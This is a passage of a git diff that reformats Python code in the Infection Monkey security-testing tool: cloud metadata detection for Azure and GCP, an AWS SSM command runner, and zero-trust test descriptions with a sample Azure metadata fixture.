"string", "ip_address": "string", "name": "string", "os": "string"}], + ) diff --git a/monkey/common/cloud/azure/azure_instance.py b/monkey/common/cloud/azure/azure_instance.py index 969e4a8ca..186ce3c9d 100644 --- a/monkey/common/cloud/azure/azure_instance.py +++ b/monkey/common/cloud/azure/azure_instance.py @@ -8,7 +8,9 @@ from common.cloud.instance import CloudInstance from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT LATEST_AZURE_METADATA_API_VERSION = "2019-04-30" -AZURE_METADATA_SERVICE_URL = "http://169.254.169.254/metadata/instance?api-version=%s" % 
LATEST_AZURE_METADATA_API_VERSION +AZURE_METADATA_SERVICE_URL = ( + "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION +) logger = logging.getLogger(__name__) @@ -18,6 +20,7 @@ class AzureInstance(CloudInstance): Access to useful information about the current machine if it's an Azure VM. Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service """ + def is_instance(self): return self._on_azure @@ -34,9 +37,11 @@ class AzureInstance(CloudInstance): self._on_azure = False try: - response = requests.get(AZURE_METADATA_SERVICE_URL, - headers={"Metadata": "true"}, - timeout=SHORT_REQUEST_TIMEOUT) + response = requests.get( + AZURE_METADATA_SERVICE_URL, + headers={"Metadata": "true"}, + timeout=SHORT_REQUEST_TIMEOUT, + ) # If not on cloud, the metadata URL is non-routable and the connection will fail. # If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false. @@ -46,7 +51,9 @@ class AzureInstance(CloudInstance): else: logger.warning(f"Metadata response not ok: {response.status_code}") except requests.RequestException: - logger.debug("Failed to get response from Azure metadata service: This instance is not on Azure.") + logger.debug( + "Failed to get response from Azure metadata service: This instance is not on Azure." + ) def try_parse_response(self, response): try: diff --git a/monkey/common/cloud/azure/test_azure_instance.py b/monkey/common/cloud/azure/test_azure_instance.py index 680af90ed..7c5770446 100644 --- a/monkey/common/cloud/azure/test_azure_instance.py +++ b/monkey/common/cloud/azure/test_azure_instance.py @@ -3,84 +3,104 @@ import requests import requests_mock import simplejson -from common.cloud.azure.azure_instance import (AZURE_METADATA_SERVICE_URL, - AzureInstance) +from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureInstance from common.cloud.environment_names import Environment GOOD_DATA = { - 'compute': {'azEnvironment': 'AZUREPUBLICCLOUD', - 'isHostCompatibilityLayerVm': 'true', - 'licenseType': 'Windows_Client', - 'location': 'westus', - 'name': 'examplevmname', - 'offer': 'Windows', - 'osProfile': {'adminUsername': 'admin', - 'computerName': 'examplevmname', - 'disablePasswordAuthentication': 'true'}, - 'osType': 'linux', - 'placementGroupId': 'f67c14ab-e92c-408c-ae2d-da15866ec79a', - 'plan': {'name': 'planName', - 'product': 'planProduct', - 'publisher': 'planPublisher'}, - 'platformFaultDomain': '36', - 'platformUpdateDomain': '42', - 'publicKeys': [{'keyData': 'ssh-rsa 0', - 'path': '/home/user/.ssh/authorized_keys0'}, - {'keyData': 'ssh-rsa 1', - 'path': '/home/user/.ssh/authorized_keys1'}], - 'publisher': 'RDFE-Test-Microsoft-Windows-Server-Group', - 'resourceGroupName': 'macikgo-test-may-23', - 'resourceId': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/' - 'providers/Microsoft.Compute/virtualMachines/examplevmname', - 'securityProfile': {'secureBootEnabled': 'true', - 'virtualTpmEnabled': 'false'}, - 'sku': 'Windows-Server-2012-R2-Datacenter', - 'storageProfile': {'dataDisks': [{'caching': 'None', - 'createOption': 'Empty', - 'diskSizeGB': '1024', - 'image': {'uri': ''}, - 'lun': '0', - 'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/' - 'resourceGroups/macikgo-test-may-23/providers/' - 'Microsoft.Compute/disks/exampledatadiskname', - 'storageAccountType': 'Standard_LRS'}, - 'name': 'exampledatadiskname', - 'vhd': {'uri': ''}, 
- 'writeAcceleratorEnabled': 'false'}], - 'imageReference': {'id': '', - 'offer': 'UbuntuServer', - 'publisher': 'Canonical', - 'sku': '16.04.0-LTS', - 'version': 'latest'}, - 'osDisk': {'caching': 'ReadWrite', - 'createOption': 'FromImage', - 'diskSizeGB': '30', - 'diffDiskSettings': {'option': 'Local'}, - 'encryptionSettings': {'enabled': 'false'}, - 'image': {'uri': ''}, - 'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/' - 'resourceGroups/macikgo-test-may-23/providers/' - 'Microsoft.Compute/disks/exampleosdiskname', - 'storageAccountType': 'Standard_LRS'}, - 'name': 'exampleosdiskname', - 'osType': 'Linux', - 'vhd': {'uri': ''}, - 'writeAcceleratorEnabled': 'false'}}, - 'subscriptionId': 'xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx', - 'tags': 'baz:bash;foo:bar', - 'version': '15.05.22', - 'vmId': '02aab8a4-74ef-476e-8182-f6d2ba4166a6', - 'vmScaleSetName': 'crpteste9vflji9', - 'vmSize': 'Standard_A3', - 'zone': ''}, - 'network': {'interface': [{'ipv4': {'ipAddress': [{'privateIpAddress': '10.144.133.132', - 'publicIpAddress': ''}], - 'subnet': [{'address': '10.144.133.128', - 'prefix': '26'}]}, - 'ipv6': {'ipAddress': []}, - 'macAddress': '0011AAFFBB22'}]} - } + "compute": { + "azEnvironment": "AZUREPUBLICCLOUD", + "isHostCompatibilityLayerVm": "true", + "licenseType": "Windows_Client", + "location": "westus", + "name": "examplevmname", + "offer": "Windows", + "osProfile": { + "adminUsername": "admin", + "computerName": "examplevmname", + "disablePasswordAuthentication": "true", + }, + "osType": "linux", + "placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a", + "plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"}, + "platformFaultDomain": "36", + "platformUpdateDomain": "42", + "publicKeys": [ + {"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"}, + {"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"}, + ], + "publisher": "RDFE-Test-Microsoft-Windows-Server-Group", + "resourceGroupName": "macikgo-test-may-23", + "resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/" + "providers/Microsoft.Compute/virtualMachines/examplevmname", + "securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"}, + "sku": "Windows-Server-2012-R2-Datacenter", + "storageProfile": { + "dataDisks": [ + { + "caching": "None", + "createOption": "Empty", + "diskSizeGB": "1024", + "image": {"uri": ""}, + "lun": "0", + "managedDisk": { + "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/" + "resourceGroups/macikgo-test-may-23/providers/" + "Microsoft.Compute/disks/exampledatadiskname", + "storageAccountType": "Standard_LRS", + }, + "name": "exampledatadiskname", + "vhd": {"uri": ""}, + "writeAcceleratorEnabled": "false", + } + ], + "imageReference": { + "id": "", + "offer": "UbuntuServer", + "publisher": "Canonical", + "sku": "16.04.0-LTS", + "version": "latest", + }, + "osDisk": { + "caching": "ReadWrite", + "createOption": "FromImage", + "diskSizeGB": "30", + "diffDiskSettings": {"option": "Local"}, + "encryptionSettings": {"enabled": "false"}, + "image": {"uri": ""}, + "managedDisk": { + "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/" + "resourceGroups/macikgo-test-may-23/providers/" + "Microsoft.Compute/disks/exampleosdiskname", + "storageAccountType": "Standard_LRS", + }, + "name": "exampleosdiskname", + "osType": "Linux", + "vhd": {"uri": ""}, + "writeAcceleratorEnabled": "false", + }, + }, + "subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx", + 
"tags": "baz:bash;foo:bar", + "version": "15.05.22", + "vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6", + "vmScaleSetName": "crpteste9vflji9", + "vmSize": "Standard_A3", + "zone": "", + }, + "network": { + "interface": [ + { + "ipv4": { + "ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}], + "subnet": [{"address": "10.144.133.128", "prefix": "26"}], + }, + "ipv6": {"ipAddress": []}, + "macAddress": "0011AAFFBB22", + } + ] + }, +} BAD_DATA_NOT_JSON = '\n\n< javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n\n\n \n\n' -BAD_DATA_JSON = {'': ''} +BAD_DATA_JSON = {"": ""} def get_test_azure_instance(url, **kwargs): @@ -114,9 +134,9 @@ def test_get_cloud_provider_name_good_data(good_data_mock_instance): def test_try_parse_response_good_data(good_data_mock_instance): - assert good_data_mock_instance.instance_name == GOOD_DATA['compute']['name'] - assert good_data_mock_instance.instance_id == GOOD_DATA['compute']['vmId'] - assert good_data_mock_instance.location == GOOD_DATA['compute']['location'] + assert good_data_mock_instance.instance_name == GOOD_DATA["compute"]["name"] + assert good_data_mock_instance.instance_id == GOOD_DATA["compute"]["vmId"] + assert good_data_mock_instance.location == GOOD_DATA["compute"]["location"] # good request, bad data (json) diff --git a/monkey/common/cloud/gcp/gcp_instance.py b/monkey/common/cloud/gcp/gcp_instance.py index 6c14500db..14e4e554a 100644 --- a/monkey/common/cloud/gcp/gcp_instance.py +++ b/monkey/common/cloud/gcp/gcp_instance.py @@ -16,6 +16,7 @@ class GcpInstance(CloudInstance): """ Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce """ + def is_instance(self): return self._on_gcp @@ -37,9 +38,17 @@ class GcpInstance(CloudInstance): logger.warning("Got unexpected GCP Metadata format") else: if not response.headers["Metadata-Flavor"] == "Google": - logger.warning("Got unexpected Metadata flavor: {}".format(response.headers["Metadata-Flavor"])) + logger.warning( + "Got unexpected Metadata flavor: {}".format( + response.headers["Metadata-Flavor"] + ) + ) else: - logger.warning("On GCP, but metadata response not ok: {}".format(response.status_code)) + logger.warning( + "On GCP, but metadata response not ok: {}".format(response.status_code) + ) except requests.RequestException: - logger.debug("Failed to get response from GCP metadata service: This instance is not on GCP") + logger.debug( + "Failed to get response from GCP metadata service: This instance is not on GCP" + ) self._on_gcp = False diff --git a/monkey/common/cloud/instance.py b/monkey/common/cloud/instance.py index abe0c7910..f0da19359 100644 --- a/monkey/common/cloud/instance.py +++ b/monkey/common/cloud/instance.py @@ -7,6 +7,7 @@ class CloudInstance(object): The current machine can be a cloud instance (for example EC2 instance or Azure VM). 
""" + def is_instance(self) -> bool: raise NotImplementedError() diff --git a/monkey/common/cloud/scoutsuite_consts.py b/monkey/common/cloud/scoutsuite_consts.py index 4db862a4a..091b51114 100644 --- a/monkey/common/cloud/scoutsuite_consts.py +++ b/monkey/common/cloud/scoutsuite_consts.py @@ -2,8 +2,8 @@ from enum import Enum class CloudProviders(Enum): - AWS = 'aws' - AZURE = 'azure' - GCP = 'gcp' - ALIBABA = 'aliyun' - ORACLE = 'oci' + AWS = "aws" + AZURE = "azure" + GCP = "gcp" + ALIBABA = "aliyun" + ORACLE = "oci" diff --git a/monkey/common/cmd/aws/aws_cmd_result.py b/monkey/common/cmd/aws/aws_cmd_result.py index 3499f8d14..1e89115ef 100644 --- a/monkey/common/cmd/aws/aws_cmd_result.py +++ b/monkey/common/cmd/aws/aws_cmd_result.py @@ -1,6 +1,6 @@ from common.cmd.cmd_result import CmdResult -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class AwsCmdResult(CmdResult): @@ -10,8 +10,11 @@ class AwsCmdResult(CmdResult): def __init__(self, command_info): super(AwsCmdResult, self).__init__( - self.is_successful(command_info, True), command_info['ResponseCode'], command_info['StandardOutputContent'], - command_info['StandardErrorContent']) + self.is_successful(command_info, True), + command_info["ResponseCode"], + command_info["StandardOutputContent"], + command_info["StandardErrorContent"], + ) self.command_info = command_info @staticmethod @@ -22,4 +25,6 @@ class AwsCmdResult(CmdResult): :param is_timeout: Whether the given command timed out :return: True if successful, False otherwise. """ - return (command_info['Status'] == 'Success') or (is_timeout and (command_info['Status'] == 'InProgress')) + return (command_info["Status"] == "Success") or ( + is_timeout and (command_info["Status"] == "InProgress") + ) diff --git a/monkey/common/cmd/aws/aws_cmd_runner.py b/monkey/common/cmd/aws/aws_cmd_runner.py index 1ab680c4d..1ccdd104b 100644 --- a/monkey/common/cmd/aws/aws_cmd_runner.py +++ b/monkey/common/cmd/aws/aws_cmd_runner.py @@ -5,7 +5,7 @@ from common.cmd.aws.aws_cmd_result import AwsCmdResult from common.cmd.cmd_runner import CmdRunner from common.cmd.cmd_status import CmdStatus -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" logger = logging.getLogger(__name__) @@ -19,7 +19,7 @@ class AwsCmdRunner(CmdRunner): super(AwsCmdRunner, self).__init__(is_linux) self.instance_id = instance_id self.region = region - self.ssm = AwsService.get_client('ssm', region) + self.ssm = AwsService.get_client("ssm", region) def query_command(self, command_id): return self.ssm.get_command_invocation(CommandId=command_id, InstanceId=self.instance_id) @@ -28,15 +28,18 @@ class AwsCmdRunner(CmdRunner): return AwsCmdResult(command_info) def get_command_status(self, command_info): - if command_info['Status'] == 'InProgress': + if command_info["Status"] == "InProgress": return CmdStatus.IN_PROGRESS - elif command_info['Status'] == 'Success': + elif command_info["Status"] == "Success": return CmdStatus.SUCCESS else: return CmdStatus.FAILURE def run_command_async(self, command_line): doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript" - command_res = self.ssm.send_command(DocumentName=doc_name, Parameters={'commands': [command_line]}, - InstanceIds=[self.instance_id]) - return command_res['Command']['CommandId'] + command_res = self.ssm.send_command( + DocumentName=doc_name, + Parameters={"commands": [command_line]}, + InstanceIds=[self.instance_id], + ) + return command_res["Command"]["CommandId"] diff --git a/monkey/common/cmd/cmd.py b/monkey/common/cmd/cmd.py 
index 8cb2177a2..a1894eb54 100644 --- a/monkey/common/cmd/cmd.py +++ b/monkey/common/cmd/cmd.py @@ -1,4 +1,4 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class Cmd(object): diff --git a/monkey/common/cmd/cmd_result.py b/monkey/common/cmd/cmd_result.py index d3039736f..6d2a4621d 100644 --- a/monkey/common/cmd/cmd_result.py +++ b/monkey/common/cmd/cmd_result.py @@ -1,4 +1,4 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class CmdResult(object): diff --git a/monkey/common/cmd/cmd_runner.py b/monkey/common/cmd/cmd_runner.py index 5cc40ca24..57966d0b5 100644 --- a/monkey/common/cmd/cmd_runner.py +++ b/monkey/common/cmd/cmd_runner.py @@ -6,7 +6,7 @@ from common.cmd.cmd import Cmd from common.cmd.cmd_result import CmdResult from common.cmd.cmd_status import CmdStatus -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" logger = logging.getLogger(__name__) @@ -64,7 +64,7 @@ class CmdRunner(object): command_result_pairs = CmdRunner.wait_commands(list(command_instance_dict.keys())) for command, result in command_result_pairs: instance = command_instance_dict[command] - instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result) + instance_results[instance["instance_id"]] = inst_n_cmd_res_to_res(instance, result) return instance_results @@ -91,7 +91,9 @@ class CmdRunner(object): results = [] while (curr_time - init_time < timeout) and (len(commands) != 0): - for command in list(commands): # list(commands) clones the list. We do so because we remove items inside + for command in list( + commands + ): # list(commands) clones the list. We do so because we remove items inside CmdRunner._process_command(command, commands, results, True) time.sleep(CmdRunner.WAIT_SLEEP_TIME) @@ -102,8 +104,11 @@ class CmdRunner(object): for command, result in results: if not result.is_success: - logger.error('The following command failed: `%s`. status code: %s', - str(command[1]), str(result.status_code)) + logger.error( + "The following command failed: `%s`. 
status code: %s", + str(command[1]), + str(result.status_code), + ) return results @@ -148,11 +153,13 @@ class CmdRunner(object): c_id = command.cmd_id try: command_info = c_runner.query_command(c_id) - if (not should_process_only_finished) or c_runner.get_command_status(command_info) != CmdStatus.IN_PROGRESS: + if (not should_process_only_finished) or c_runner.get_command_status( + command_info + ) != CmdStatus.IN_PROGRESS: commands.remove(command) results.append((command, c_runner.get_command_result(command_info))) except Exception: - logger.exception('Exception while querying command: `%s`', str(c_id)) + logger.exception("Exception while querying command: `%s`", str(c_id)) if not should_process_only_finished: commands.remove(command) results.append((command, CmdResult(False))) diff --git a/monkey/common/cmd/cmd_status.py b/monkey/common/cmd/cmd_status.py index 2fc9cc168..a4e435239 100644 --- a/monkey/common/cmd/cmd_status.py +++ b/monkey/common/cmd/cmd_status.py @@ -1,6 +1,6 @@ from enum import Enum -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class CmdStatus(Enum): diff --git a/monkey/common/common_consts/api_url_consts.py b/monkey/common/common_consts/api_url_consts.py index 4fef6b11b..91f289218 100644 --- a/monkey/common/common_consts/api_url_consts.py +++ b/monkey/common/common_consts/api_url_consts.py @@ -1 +1 @@ -T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download' +T1216_PBA_FILE_DOWNLOAD_PATH = "/api/t1216-pba/download" diff --git a/monkey/common/common_consts/network_consts.py b/monkey/common/common_consts/network_consts.py index b194c9421..8966c23d7 100644 --- a/monkey/common/common_consts/network_consts.py +++ b/monkey/common/common_consts/network_consts.py @@ -1 +1 @@ -ES_SERVICE = 'elastic-search-9200' +ES_SERVICE = "elastic-search-9200" diff --git a/monkey/common/common_consts/telem_categories.py b/monkey/common/common_consts/telem_categories.py index 70066d290..280cfce05 100644 --- a/monkey/common/common_consts/telem_categories.py +++ b/monkey/common/common_consts/telem_categories.py @@ -1,10 +1,10 @@ class TelemCategoryEnum: - EXPLOIT = 'exploit' - POST_BREACH = 'post_breach' - SCAN = 'scan' - SCOUTSUITE = 'scoutsuite' - STATE = 'state' - SYSTEM_INFO = 'system_info' - TRACE = 'trace' - TUNNEL = 'tunnel' - ATTACK = 'attack' + EXPLOIT = "exploit" + POST_BREACH = "post_breach" + SCAN = "scan" + SCOUTSUITE = "scoutsuite" + STATE = "state" + SYSTEM_INFO = "system_info" + TRACE = "trace" + TUNNEL = "tunnel" + ATTACK = "attack" diff --git a/monkey/common/common_consts/zero_trust_consts.py b/monkey/common/common_consts/zero_trust_consts.py index e6a6b29c5..539bb7265 100644 --- a/monkey/common/common_consts/zero_trust_consts.py +++ b/monkey/common/common_consts/zero_trust_consts.py @@ -13,7 +13,15 @@ DEVICES = "Devices" NETWORKS = "Networks" PEOPLE = "People" DATA = "Data" -PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION) +PILLARS = ( + DATA, + PEOPLE, + NETWORKS, + DEVICES, + WORKLOADS, + VISIBILITY_ANALYTICS, + AUTOMATION_ORCHESTRATION, +) STATUS_UNEXECUTED = "Unexecuted" STATUS_PASSED = "Passed" @@ -57,7 +65,7 @@ TESTS = ( TEST_SCOUTSUITE_SECURE_AUTHENTICATION, TEST_SCOUTSUITE_RESTRICTIVE_POLICIES, TEST_SCOUTSUITE_LOGGING, - TEST_SCOUTSUITE_SERVICE_SECURITY + TEST_SCOUTSUITE_SERVICE_SECURITY, ) PRINCIPLE_DATA_CONFIDENTIALITY = "data_transit" @@ -78,10 +86,10 @@ PRINCIPLES = { PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.", PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: 
"Configure network policies to be as restrictive as possible.", PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory " - "Access Control) only.", + "Access Control) only.", PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.", PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.", - PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources." + PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.", } POSSIBLE_STATUSES_KEY = "possible_statuses" @@ -92,183 +100,183 @@ TEST_EXPLANATION_KEY = "explanation" TESTS_MAP = { TEST_SEGMENTATION: { TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's " - "running on, that belong to different network segments.", + "running on, that belong to different network segments.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.", - STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs." + STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.", }, PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION, PILLARS_KEY: [NETWORKS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED], }, TEST_MALICIOUS_ACTIVITY_TIMELINE: { TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting " - "exploitation.", + "exploitation.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts." }, PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY], }, TEST_ENDPOINT_SECURITY_EXISTS: { TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus " - "software on endpoints.", + "software on endpoints.", STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a " - "security concern. " + "security concern. ", }, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY, PILLARS_KEY: [DEVICES], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_MACHINE_EXPLOITED: { TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see " - "which endpoints were compromised.", - STATUS_PASSED: "Monkey didn't manage to exploit an endpoint." 
+ "which endpoints were compromised.", + STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.", }, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY, PILLARS_KEY: [DEVICES], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY], }, TEST_SCHEDULED_EXECUTION: { TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security " - "software.", - STATUS_PASSED: "Monkey failed to execute in a scheduled manner." + "software.", + STATUS_PASSED: "Monkey failed to execute in a scheduled manner.", }, PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR, PILLARS_KEY: [PEOPLE, NETWORKS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY], }, TEST_DATA_ENDPOINT_ELASTIC: { TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.", STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts " - "that indicate attempts to access them. " + "that indicate attempts to access them. ", }, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY, PILLARS_KEY: [DATA], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_DATA_ENDPOINT_HTTP: { TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.", STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate " - "attempts to access them. " + "attempts to access them. ", }, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY, PILLARS_KEY: [DATA], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_DATA_ENDPOINT_POSTGRESQL: { TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.", STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that " - "indicate attempts to access them. " + "indicate attempts to access them. ", }, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY, PILLARS_KEY: [DATA], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_TUNNELING: { TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - " - "restrict them. " + "restrict them. 
" }, PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED], }, TEST_COMMUNICATE_AS_NEW_USER: { TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - " - "restrict them to MAC only.", - STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network." + "restrict them to MAC only.", + STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.", }, PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES, PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: { TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.", - STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules." + STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.", }, PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, PILLARS_KEY: [NETWORKS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_UNENCRYPTED_DATA: { TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found resources with unencrypted data.", - STATUS_PASSED: "ScoutSuite found no resources with unencrypted data." + STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.", }, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY, PILLARS_KEY: [DATA], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: { TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found resources not protected against data loss.", - STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss." + STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.", }, PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY, PILLARS_KEY: [DATA], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_SECURE_AUTHENTICATION: { TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: 